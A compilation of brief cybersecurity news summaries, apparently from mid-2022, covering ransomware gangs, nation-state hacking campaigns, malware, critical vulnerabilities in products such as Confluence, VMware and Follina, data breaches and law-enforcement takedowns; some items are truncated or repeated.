    Several US federal agencies today revealed that Chinese-backed threat actors have targeted and compromised major telecommunications companies and network service providers to steal credentials and harvest data. The NSA, CISA, and the FBI released a joint cybersecurity advisory Tuesday evening. Chinese threat actors are exploiting known vulnerabilities in home office routers, and even targeting those used in medium and large enterprises. The compromised devices are used as command and control servers and proxy systems, which allow the threat actors to move laterally to other networks.

    Researchers Warn of Spam Campaign Targeting Victims with SVCReady Malware

    Researchers at HP have spotted a new wave of phishing campaigns spreading a previously documented malware dubbed “SVCReady.” SVCReady is said to be in its early stage of development, with the authors iteratively updating the malware several times last month. First signs of activity date back to April 22, 2022. SVCReady is commonly spread via emails containing macro-laced word documents. Upon opening these documents, victims are prompted to enable macros by clicking on the “Enable Content” button. In turn, this activates the deployment of malicious payloads.

    QBot Now Pushes Black Basta Ransomware in Bot-Powered Attacks

    Researchers at the NCC Group discovered a new partnership between the Black Basta Ransomware group Qakbot malware operation during a recent incident response. QBot (QuakBot) is Windows malware that steals bank credentials, Windows domain credentials, and delivers further malware payloads on infected devices. Victims usually become infected with Qbot via phishing attacks with malicious attachments. Even though it started as a banking trojan, it has had numerous collaborations with other ransomware gangs, including MegaCortex, ProLock, DoppelPaymer, and Egregor.

    Shields Health Care Group Data Breach Affects 2 Million Patients

    Shields Health Care Group (Shields) suffered a data breach that exposed the data of approximately 2,000,000 people in the United States after hackers breached their network and stole data. Shields is a Massachusetts-based medical services provider specializing in MRI and PET/CT diagnostic imaging, radiation oncology, and ambulatory surgical services. According to a data breach notification published on the company's site, Shield became aware of the cyberattack on March 28, 2022, and hired cybersecurity specialists to determine the scope of the incident.

    Cisco Firepower Threat Defense Snort Memory Leak DoS

    It was disclosed a while back that Cisco FTD Software was affected by a denial of service vulnerability; an advisory from Nessus today notes that CFTD/Snort is susceptible to DOS attacks stemming from the same flaw, “A denial of service (DoS) vulnerability exists in the way the Snort detection engine processes ICMP traffic. An unauthenticated, remote attacker can exploit this issue by sending a series of ICMP packets which can cause the device to stop responding.

    The Costs and Damages of DNS Attacks

    Security Company EfficientIP released their eighth annual Global DNS Threat Report. The focus of the report is Domain Name System (DNS) attacks and their impacts on global organizations over the past 12 months. “The report uncovers how despite 73% of organizations knowing that DNS security is critical to their business, cyber criminals are still infiltrating the network and causing significant business disruption, resulting in the shutdown of cloud and on-premise applications and theft of data. As enterprises continue to strike a balance between supporting remote workers and mitigating the network security risks posed by the rise in hybrid work models and reliance on cloud applications, the results show that 88% of organizations have experienced one or more DNS attacks on their business. Each successful attack costs the business, on average, $942,000.

    Another Nation-state Actor Exploits Microsoft Follina to Attack European and US Entities

    An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability in attacks aimed at government entities in Europe and the U.S. Follina, tracked as CVE-2022-30190 resides in Microsoft Office and is a zero-day vulnerability yet to be patched, though several workarounds are available. In an advisory released by Microsoft, they say, “A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

    Exploit Released for Atlassian Confluence RCE Bug, Patch Now

    Proof-of-concept exploits for the actively exploited critical CVE-2022-26134 vulnerability impacting Atlassian Confluence and Data Center servers have been widely released this weekend. “The vulnerability tracked as CVE-2022-26134 is a critical unauthenticated, remote code execution vulnerability exploited through OGNL injection and impacts all Atlassian Confluence and Data Center 2016 servers after version 1.3.0.

    Evasive Phishing Mixes Reverse Tunnels and URL Shortening Services

    Security researchers are seeing an uptick in the use of reverse tunnel services along with URL shorteners for large-scale phishing campaigns, making the malicious activity more difficult to stop. This practice deviates from the more common method of registering domains with hosting providers, who are likely to respond to complaints and take down the phishing sites.

    Closing the Door: DeadBolt Ransomware Locks Out Vendors With Multitiered Extortion Scheme

    The DeadBolt ransomware kicked off 2022 with a slew of attacks that targeted internet-facing Network-Attached Storage (NAS) devices. It was first seen targeting QNAP Systems, Inc. in January 2022. According to a report from attack surface solutions provider Censys.io, as of Jan. 26, 2022, out of 130,000 QNAP NAS devices that were potential targets, 4,988 services showed signs of a DeadBolt infection. A few weeks later, ASUSTOR, another NAS devices and video surveillance solutions vendor, also experienced DeadBolt ransomware attacks that targeted an unknown number of its devices. In March, DeadBolt attackers once again targeted QNAP devices; according to Censys.io, the number of infections reached 1,146 by March 19, 2022. Most recently, on May 19,2022, QNAP released a product security update stating that internet-connected QNAP devices were once again been targeted by DeadBolt, this time aiming at NAS devices using QTS 4.3.6 and QTS 4.4.1.

    Atlassian Confluence Zero-Day Actively Used in Attacks - Atlassian Fixes Confluence Zero-Day Widely Exploited in Attacks

    The company has now released patches and advises all customers to upgrade their appliances to versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1, which contain a fix for this flaw. Admins who cannot immediately upgrade their Confluence installs can also use a temporary workaround to mitigate the CVE-2022-26134 security bug by updating some JAR files on their Confluence servers.

    Microsoft Disrupts Bohrium Hackers’ Spear-Phishing Operation

    The Microsoft Digital Crimes Unit (DCU) has disrupted a spear-phishing operation linked to an Iranian threat actor tracked as Bohrium that targeted customers in the U.S., Middle East, and India. Bohrium has targeted organizations from a wide range of industry sectors, including tech, transportation, government, and education, according to Amy Hogan-Burney, the General Manager of Microsoft DCU.

    GitLab Security Update Fixes Critical Account Take Over Flaw

    GitLab has released a critical security update for multiple versions of its Community and Enterprise Edition products to address eight vulnerabilities, one of which allows account takeover. Tracked as CVE-2022-1680 and rated with a critical severity score of 9.9, the vulnerability affects all GitLab versions 11.10 through 14.9.4, 14.10 through 14.10.3, and version 15.0.

    Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies

    Microsoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium. The adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022. In addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created and that it notified affected organizations.

    Ransomware Gang Now Hacks Corporate Websites to Show Ransom Notes

    A ransomware gang is taking extortion to a new level by publicly hacking corporate websites to publicly display ransom notes. This new extortion strategy is being conducted by Industrial Spy, a data extortion gang that recently began using ransomware as part of their attacks. As part of their attacks, Industrial Spy will breach networks, steal data, and deploy ransomware on devices. The threat actors then threaten to sell the stolen data on their Tor marketplace if a ransom is not paid.

    Critical Atlassian Confluence Zero-Day Actively Used in Attacks

    Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time. On Thursday, Atlassian released a security advisory disclosing that CVE-2022-26134 is a critical unauthenticated, remote code execution vulnerability tracked in both Confluence Server and Data Center. Atlassian says that they confirmed the vulnerability in Confluence Server 7.18.0 and believe that Confluence Server and Data Center 7.4.0 and higher are also vulnerable.

    Critical UNISOC Chip Vulnerability Affects Millions of Android Smartphones

    UNISOC, a semiconductor company based in Shanghai, is the world's fourth-largest mobile processor manufacturer after Mediatek, Qualcomm, and Apple, accounting for 10% of all SoC shipments in Q3 2021, according to Counterpoint Research. A critical security flaw has been uncovered in UNISOC's smartphone chipset that could be potentially weaponized to disrupt a smartphone's radio communications through a malformed packet, "Left unpatched, a hacker or a military unit can leverage such a vulnerability to neutralize communications in a specific location," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "The vulnerability is in the modem firmware, not in the Android OS itself.

    DOJ Seizes 3 Web Domains Used to Sell Stolen Data and DDoS Services

    The FBI and U.S. Department of Justice (DoJ) announced on Wednesday the seizure of three domains used by cybercriminals to trade stolen personal information and facilitate distributed denial-of-service (DDoS) attacks for hire. The three domains seized include weleakinfo[.]to, ipstress[.]in, and ovh-booter[.]com. Weleakinfo[.]to allowed its users to traffic hacked personal data and offered a searchable database containing illegally amassed information obtained from over 10,000 data breaches. The database consisted of seven billion indexed records featuring names, email addresses, usernames, phone numbers, and passwords for online accounts that could be accessed through different subscription tiers.

    Cybercriminals Hold 1,200 Unsecured Elasticsearch Databases for Ransom

    Security researchers at Secureworks have uncovered a new campaign targeting poorly secured Elasticsearch databases to replace their data with a ransom note. Over 1,200 databases that could be accessed without authentication have already fallen victim to the attackers. So far Secureworks has identified 450 individual requests for ransom payments demanding 0.012 Bitcoin in exchange for the data. In total, the ransom requests amount to roughly $280,000.

    Conti Ransomware Targeted Intel Firmware for Stealthy Attacks

    Researchers analyzing the leaked chats of the notorious Conti ransomware operation have discovered that teams inside the Russian cybercrime group were actively developing firmware hacks. According to messages exchanged between members of the cybercrime syndicate, Conti developers had created proof-of-concept (PoC) code that leveraged Intel’s Management Engine (ME) to overwrite flash and gain SMM (System Management Mode) execution.

    Microsoft Office Apps are Vulnerable to IDN Homograph Attacks

    Microsoft Office apps – including Outlook and Teams – are vulnerable to homograph attacks based on internationalized domain names (IDNs). In practice, this means that users hovering above a link in a phishing email, a Word or Excel document they have received, or a message sent via Teams, can’t tell that it will direct them to a spoofed malicious domain that’s not what it purports to be.

    Windows MSDT Zero-Day Now Exploited by Chinese APT Hackers

    Chinese-linked APT group, TA413, is now actively exploiting the Microsoft Office zero-day vulnerability (known as 'Follina') to execute malicious code remotely on Windows systems. Tracked as CVE-2022-30190, the remote-execution flaw impacts all Windows client and server platforms still receiving security updates (Windows 7 or later and Windows Server 2008 or later).

    Costa Rica’s Public Health Agency Hit by Hive Ransomware

    Costa Rica’s public health service (known as Costa Rican Social Security Fund or CCCS) was hit by a Hive ransomware attack yesterday, rendering its computer systems to go offline. Hive, a Ransomware-as-a-Service (RaaS) operation active since at least June 2021, has been behind attacks on over 30 organizations, counting only the victims who refused to pay the ransom and had their data leaked online.

    New XLoader Botnet Uses Probability Theory to Hide Its Servers

    Threat analysts have spotted a new version of the XLoader botnet malware that uses probability theory to hide its command and control servers, making it difficult to disrupt the malware's operation. This helps the malware operators continue using the same infrastructure without the risk of losing nodes due to blocks on identified IP addresses while also reducing the chances of being tracked and identified.

    Sidewinder Hackers Plant Fake Android VPN App in Google Play Store

    Phishing campaigns attributed to an advanced threat actor called SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting. SideWinder is an APT group that’s been active since at least 2012, believed to be an actor of Indian origin with a relatively high level of sophistication. Security researchers at Kaspersky attributed close to 1,000 attacks to this group in the past two years. Among its primary targets are organizations in Pakistan, China, Nepal, and Afghanistan. The adversary relies on a fairly large infrastructure with that includes more than 92 IP addresses, mainly for phishing attacks, hosting hundreds of domains and subdomains used as command and control servers.

    FluBot Android Malware Operation Shutdown by Law Enforcement

    Europol has announced the takedown of the FluBot operation, one of the largest and fastest-growing Android malware operations in existence. The malware operation's takedown resulted from a law enforcement operation involving eleven countries following a complex technical investigation to pinpoint FluBot's most critical infrastructure. The participants in the operation were Australia, Belgium, Finland, Hungary, Ireland, Spain, Sweden, Switzerland, the Netherlands, and the United States.

    Anonymous Claims Attacks Against Belarus for Involvement in Russian Invasion of Ukraine

    Anonymous-affiliated collective Spid3r claims to have attacked Belarus’ government websites in retaliation for the country’s alleged support of Russia’s invasion of Ukraine. The group made the announcement on Twitter, publishing screenshots of various websites connected with the Belarus state being down, including the Ministry of Communications, the Ministry of Justice and the Ministry of Economy.

    Experts Warn of Ransomware Attacks Against Government Organizations of Small States

    Cyber Research Labs observed a rise in ransomware attacks in the second quarter of 2022, some of them with a severe impact on the victims, such as the attack that hit the Costa Rican government that caused a nationwide crisis. The experts warn of ransomware attacks against government organizations. They observed a total of 48 government organizations from 21 countries that were hit by 13 ransomware attacks in 2022.

    Interpol Arrests Alleged Leader of the SilverTerrier BEC Gang

    After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT. Codenamed Delilah, the law enforcement operation engaged police agencies across four continents and is the third one focused on identifying and arresting suspected members of the SilverTerrier gang.

    New ERMAC 2.0 Android Malware Steals Accounts, Wallets From 467 Apps

    The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto-wallets. The goal of the trojan is to send stolen login credentials to threat actors, who then use them to take control of other people’s banking and cryptocurrency accounts and conduct financial or other forms of fraud.

    BlackCat/ALPHV Ransomware Asks $5 Million to Unlock Austrian State

    Austrian federal state Carinthia has been hit by the BlackCat ransomware gang, also known as ALPHV, who demanded $5 million to unlock the encrypted computer systems. ALPHV/BlackCat is a ransomware gang that emerged in November 2021. The group is a rebrand of the DarkSide/BlackMatter gang who was responsible for the Colonial Pipeline attack last year. Since the beginning of 2022, ALPHV/BlackC

    Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely

    Researchers have demonstrated what they call the "first active contactless attack against capacitive touchscreens." GhostTouch, as it's called, "uses electromagnetic interference (EMI) to inject fake touch points into a touchscreen without the need to physically touch it," a group of academics from Zhejiang University and Technical University of Darmstadt said in a new research paper.

    FBI: Compromised US Academic Credentials Available on Various Cybercrum Forums

    The FBI issued an alert to inform the higher education sector about the availability of login credentials on dark web forums that threat actors can use to launch attacks against individuals and organizations in the industry. The availability of this data is the result of continued attacks conducted by threat actors against US colleges and universities. The alert also includes recommendations and mitigations for these attacks, “This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyber-attacks against individual users or affiliated organizations.” reads the alert published by the FBI

    Experts Released PoC Exploit Code for Critical VMware CVE-2022-22972 Flaw

    Horizon3 security researchers have released a proof-of-concept (PoC) exploit and technical analysis for the critical authentication bypass vulnerability CVE-2022-22972 affecting multiple VMware products. The virtualization giant recently warned that a threat actor can exploit the CVE-2022-22972 flaw (CVSSv3 base score of 9.8) to obtain admin privileges and urges customers to install patches immediately” (Security Affairs, 2022). “This critical vulnerability should be patched or mitigated immediately per the instructions in VMSA-2021-0014. The ramifications of this vulnerability are serious.” states VMware. The vulnerability resides in Workspace ONE Access, VMware Identity Manager (vIDM), and vRealize Automation.

    Industrial Spy Data Extortion Market Gets into the Ransomware

    The Industrial Spy data extortion marketplace has now launched its own ransomware operation, where they also encrypt victim's devices. The marketplace allows threat actors, even business competitors to purchase stolen data from various companies. This marketplace sells different types of stolen data, ranging from selling 'premium' data for millions of dollars to individual files for as little as $2.

    Industrial Spy Data Extortion Market Gets into the Ransomware

    The Industrial Spy data extortion marketplace has now launched its own ransomware operation, where they also encrypt victim's devices. The marketplace allows threat actors, even business competitors to purchase stolen data from various companies. This marketplace sells different types of stolen data, ranging from selling 'premium' data for millions of dollars to individual files for as little as $2.

    Hacker of Python, PHP Libraries: No “Malicious Activity” Was Intended

    The two applications in question where 'ctx' and 'PHPass' which together been downloaded over 3 million times. the incident sparked much panic and discussion among developers—now worried about the impact of the hijack on the overall software supply chain. It was yesterday when developers noticed that the two Python and PHP libraries where modified to harvest AWS developer credentials, in what was determined to be a bug-bounty exercise or was meant to be ethical in nature. However as a result of successful penetration testing, “The hijacked versions didn't stop at basic PoC—they stole the developer's environment variables and AWS credentials, casting doubts on the intention of the hijacker or if this was even ethical research.

    Researchers Find New Malware Attacks Targeting Russian Government Entities

    An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda.

    BPFDoor Malware Uses Solaris Vulnerability to Get Root Privileges

    New research into the inner workings of the stealthy BPFdoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems. BPFDoor is a custom backdoor that has been used largely undetected for at least five years in attacks against telecommunications, government, education, and logistics organizations. The malware was discovered only recently and reported first by researchers from PricewaterhouseCoopers (PwC), who attributed it to a China-based threat actor they track as Red Menshen. PwC found BPFDoor during an incident response engagement in 2021. Looking closer at the malware, the researchers noticed that it received commands from Virtual Private Servers (VPS) controlled through compromised routers in Taiwan.

    New Zoom Flaws Could Let Attac

    Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.

    Interpol Arrests Alleged Leader of the SilverTerrier BEC Gang

    After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT. Codenamed Delilah, the law enforcement operation engaged police agencies across four continents and is the third one focused on identifying and arresting suspected members of the SilverTerrier gang.

    Interpol Arrests Alleged Leader of the SilverTerrier BEC Gang

    After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT. Codenamed Delilah, the law enforcement operation engaged police agencies across four continents and is the third one focused on identifying and arresting suspected members of the SilverTerrier gang.

    General Motors Credential Stuffing Attack Exposes Car Owners’ Info

    “US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed some customers' information and allowed hackers to redeem rewards points for gift cards. General Motors operates an online platform to help owners of Chevrolet, Buick, GMC, and Cadillac vehicles manage their bills, services, and redeem rewards points. Car owners can redeem GM rewards points towards GM vehicles, car service, accessories, and purchasing OnStar service plans.

    New Chaos Ransomware Builder Variant "Yashma" Discovered in the Wild

    The Research and Intelligence team at BlackBerry released a report today detailing a new version of the Chaos ransomware line, dubbed Yashma. Chaos is a customizable ransomware builder that emerged in underground forums on June 9, 2021, by falsely marketing itself as the .NET version of Ryuk despite sharing no such overlaps with the notorious counterpart. Since its discovery, the ransomware builder has undergone five successive iterations aimed at improving its functionalities: version 2.0 on June 17, version 3.0 on July 5, version 4.0 on August 5, and version 5.0 in early 2022.

    Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code

    Microsoft recently observed web skimming campaigns employing various obfuscation techniques to deliver and hide skimming scripts. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team said in a new report.

    Researchers to Release Exploit for New VMware Auth Bypass, Patch Now

    Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately. In an advisory on May 18th, VMware warned that the security implications for leaving CVE-2022-22972 unpatched are severe as the issue is "in the critical severity range with a maximum CVSSv3 base score of 9.8," with 10 being the maximum.

    Chinese "Twisted Panda" Hackers Caught Spying on Russian Defense Institutes

    At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed "Twisted Panda," come in the backdrop of Russia's military invasion of Ukraine, prompting a wide range of threat actors to swiftly adapt their campaigns on the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents.

    Russian Hackers Perform Reconnaissance Against Austria, Estonia

    In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College. This discovery comes from cybersecurity firm Sekoia, which built upon previous findings of Google’s TAG, which has been following Russian hackers closely this year. Google warned about coordinated Russian-based threat group activity in late March 2022, while in May, they spotted two Turla domains used in ongoing campaigns. Sekoia used this information to investigate further and found that Turla targeted the federal organization in Austria and the military college in the Baltic region.

    Google: Predator Spyware Infected Android Devices Using Zero-Days

    Google's Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox. In these attacks, part of three campaigns that started between August and October 2021, the attackers used zero-day exploits targeting Chrome and the Android OS to install Predator spyware implants on fully up-to-date Android devices.

    Threat Actors Target the InfoSec Community with Fake PoC Exploits

    Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infoSec community. The expert discovered a post where a researcher were sharing a fake Proof of Concept (POC) exploit code for an RPC Runtime Library Remote Code Execution flaw (CVE-2022-26809 CVSS 9.8). The malware, disguised as a fake PoC code, was available on GitHub.

    Cisco Urges Admins to Patch IOS XR Zero-day Exploited in Attacks

    Cisco has addressed a zero-day vulnerability in its IOS XR router software that allowed unauthenticated attackers to remotely access Redis instances running in NOSi Docker containers. The IOS XR Network OS is deployed on multiple Cisco router platforms, including NCS 540 & 560, NCS 5500, 8000, and ASR 9000 series routers.

    Conti Ransomware Shuts Down Operation, Rebrands Into Smaller Units

    Advanced Intel researcher Yelisey Boguslavskiy, announced on Twitter yesterday that the Conti ransomware gang has officially shut down its operation, stating the gang’s internal infrastructure was turned off. “While public-facing 'Conti News' data leak and the ransom negotiation sites are still online, Boguslavskiy told BleepingComputer that the Tor admin panels used by members to perform negotiations and publish "news" on their data leak site are now offline”

    Microsoft Detects Massive Surge in Linux XorDdos Malware Activity

    Microsoft stated in a blog post yesterday that it has seen a 254% increase in activity from a Linux trojan called XorDdos. XorDdos is a modular malware that amasses botnets by targeting a multitude of Linux system architectures (ARM, x86, and x64). First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its usage of XOR-based encryption for C2 communication and being employed to launch distributed denial-of-service (DDoS) attacks. As the tech giant revealed, the botnet’s success is likely due to its extensive use of various evasion and persistence tactics which allow it to remain stealthy and hard to remove.

    Modern "Smart" Farm Machinery Vulnerable to Cyber-Attackers

    A new risk analysis published today warns that modern “smart” farm machinery is vulnerable to malicious hackers, leaving global supply chains exposed to risk. The analysis, published in the journal Nature Machine Intelligence, warns that hackers could exploit flaws in agricultural hardware used to plant and harvest crops. Additionally, it said automatic crop sprayers, drones and robotic harvesters could be vulnerable to hackers.

    Canada Bans Huawei and ZTE from 5G Networks Over Security Concerns

    The Government of Canada announced its intention to ban the use of Huawei and ZTE telecommunications equipment and services across the country's 5G and 4G networks. The statement explains that after a thorough review from Canada's independent security agencies, the two Chinese tech companies have been deemed too great of a security risk to be allowed in the country's telecommunication network.

    Jupiter WordPress Plugin Flaws Let Hackers Take Over Sites

    WordPress security analysts have discovered a set of vulnerabilities impacting the Jupiter Theme and JupiterX Core plugins for WordPress, one of which is a critical privilege escalation flaw. Jupiter is a powerful high-quality theme builder for WordPress sites used by over 90,000 popular blogs, online mags, and platforms that enjoy heavy user traffic. The vulnerability, tracked as CVE-2022-1654, and given a CVSS score of 9.9 (critical), allows any authenticated user on a site using the vulnerable plugins to gain administrative privileges.

    QNAP Alerts NAS Customers of New Deadbolt Ransomware Attacks

    Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads. The company asked users to update their NAS devices to the latest software version and ensure that they're not exposed to remote access over the Internet.

    Web Trackers Caught Intercepting Online Forms Even Before Users Hit Submit

    A new research published by academics from KU Leuven, Radboud University, and the University of Lausanne has revealed that users' email addresses are exfiltrated to tracking, marketing, and analytics domains before such is submitted and without prior consent. The study involved crawling 2.8 million pages from the top 100 websites, and found that as many as 1,844 websites allowed trackers to capture email addresses before form submission in the European Union, a number that jumped to 2,950 when the same set of websites were visited from the U.S.

    Ransomware Gangs Rely More on Weaponizing Vulnerabilities

    Group IB released a report this week outline various tactics ransomware groups are using to breach victim networks. According to their research, external remote access services continue to be the main attack vector used by ransomware gangs to gain initial access. However, they note that there has been an uptick in the use of exploitable vulnerabilities.

    VMware Patches Critical Auth Bypass Flaw in Multiple Products

    VMware warned customers today to immediately patch a critical authentication bypass vulnerability "affecting local domain users" in multiple products that can be exploited to obtain admin privileges. The flaw (tracked as CVE-2022-22972) was reported by Bruno López of Innotec Security, who found that it impacts Workspace ONE Access, VMware Identity Manager (vIDM), and vRealize Automation.

    [WS] Wizard Spider Group In-Depth Analysis

    On May 16, 2022, the threat intelligence team at PRODAFT (PTI) released a report detailing the inner workings of the Wizard Spider group. Wizard Spider is a financially motivated cybercrime group that is believed to operate out of Russia. The group was first identified in 2017 and is known for the creation and deployment of TrickBot, a modular malware that was officially discounted earlier this year. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals. The group has been tied to various malware variants including Ryuk, Conti, Bazar, Cobalt Strike, etc.

    Researchers Spotted a New Variant of the UpdateAgent macOS Malware Dropper

    Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version is written in Swift and relies on the AWS infrastructure to host its malicious payloads. The malware dropper has a variety of capabilities including system fingerprinting, endpoint registration, and persistence tools. For second stage payloads, researchers found evidence of different types of malware, spyware and adware.

    Microsoft Warns of Brute-force Attacks Targeting MSSQL Servers

    Microsoft warned of brute-forcing attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers using weak passwords. While this isn't necessarily the first time MSSQL servers have been targeted in such attacks, Microsoft says that the threat actors behind this recently observed campaign are using the legitimate sqlps.exe tool as a LOLBin (short for living-off-the-land binary)

    The threat actors are using the sqlps[.]exe utility to achieve fileless persistence. The executable is a PowerShell wrapper used for running SQL-built commands. The executable is also used to create a new sysadmin account which allows them to take control of the SQL server. From there they can perform other actions and deploy additional payloads like ransomware or cryptominers.

    A Custom Powershell RAT Uses to Target German Users Using Ukraine Crisis as Bait

    Researchers at Malwarebytes uncovered a campaign that targets German users with a custom PowerShell RAT. The threat actors attempt to trick victims into opening weaponized documents by using the current situation in Ukraine as bait. The attackers registered a decoy site that was an expired German domain name at collaboration-bw[.]de. The site was hosting a bait document, named “2022-Q2-Bedrohungslage-Ukraine,” used to deliver the custom malware. The document appears to contain information about the current crisis in Ukraine.

    Hackers Target Tatsu WordPress Plugin in Millions of Attacks

    Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites. Tatsu Builder is a popular plugin that offers powerful template editing features integrated right into the web browser. Large attack waves started on May 10, 2022 and peaked four days later. Exploitation is currently ongoing.

    US Warning: North Korea's Tech Workers Posing as Freelance Developers

    Skilled software and mobile app developers from North Korea are posing as US-based remote workers to land contract work as developers in US and European tech and crypto firms. The warning comes in a new joint advisory from The US Department of State, the US Department of the Treasury, and the Federal Bureau of Investigation (FBI) outlining the role North Korean IT workers play in raising revenue for North Korea, which contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of U.S. and UN sanctions.

    CISA Warns Admins to Patch Actively Exploited VMware, Zyxel Bugs

    CISA has added two more vulnerabilities to its list of actively exploited bugs, a code injection bug in the Spring Cloud Gateway library and a command injection flaw in Zyxel firmware for business firewalls and VPN devices. The Spring Framework vulnerability (CVE-2022-22947) is a maximum severity weakness that attackers can abuse to gain remote code execution on unpatched hosts. The vulnerability is being used by a recently discovered botnet called Sysrv, which is installing cryptomining malware on vulnerable Windows and Linux servers.

    Ukraine CERT-UA Warns of New Attacks Launched by Russia-linked Armageddon APT

    Ukraine CERT has released details on a new phishing attack carried out by the Russian linked Armageddon group. The threat actors are using a HTM-file to decode and create an archive named “Henson[.]rar” which contains a malicious LNK file titled “”Kherson[.]lnk.” ”Upon clicking on the link file, the HTA-file “precarious[.]xml” is loaded and executed leading to the creation and execution of files “desktop[.]txt” and “user[.]txt”. In the last stage of the attack chain, the GammaLoad[.]PS1_v2 malware is downloaded and executed on the victim’s computer.

    Hackers are Exploiting Critical Bug in Zyxel Firewalls and VPNs

    Hackers have started to exploit a recently patched critical vulnerability tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses. Successful exploitation allows a remote attacker to inject arbitrary commands remotely without authentication, which can enable setting up a reverse shell.

    SonicWall ‘Strongly Urges’ Admins to Patch SSLVPN SMA1000 Bugs

    SonicWall "strongly urges" customers to patch several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products that can let attackers bypass authorization and, potentially, compromise unpatched appliances. SonicWall SMA 1000 SSLVPN solutions are used by enterprises to simplify end-to-end secure remote access to corporate resources across on-prem, cloud, and hybrid data center environments.

    Engineering Firm Parker Discloses Data Breach After Ransomware Attack

    The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month. Parker is an Ohio-based corporation specializing in advanced motion and control technologies, with a strong focus in aerospace hydraulic equipment. It has a revenue of $15.6 billion and employs over 58,000 people.

    Microsoft: Sysrv Botnet Targets Windows, Linux Servers With New Exploits

    Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers. Redmond discovered a new variant (tracked as Sysrv-K) that has been upgraded with more capabilities, including scanning for unpatched WordPress and Spring deployments.

    New Saitama Backdoor Targeted Official From Jordan's Foreign Ministry

    A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group.

    A 10-point Plan to Improve the Security of Open Source Software

    The Linux Foundation and the Open Source Software Security Foundation, with input provided by executives from 37 companies and many U.S. government leaders, delivered a 10-point plan to broadly address open source and software supply chain security, by securing open source security production, improving vulnerability discovery and remediation, and shortening the patching response time of the ecosystem.

    Personal Details of 21M SuperVPN, GeckoVPN Users Leaked on Telegram

    On May 7th, researchers became aware of an online database containing personal details and login credentials for 21 million users of various VPN providers. The leaked database contains 10GBs of sensitive information from SuperVPN, GeckoVPN, and ChatVPN. The details from the database were actually stolen over a year ago and were put up for sale on Dark Web marketplaces. Now, the information is publicly available on Telegram for free.

    Costa Rica Declares National Emergency Following Conti Cyber-Attack

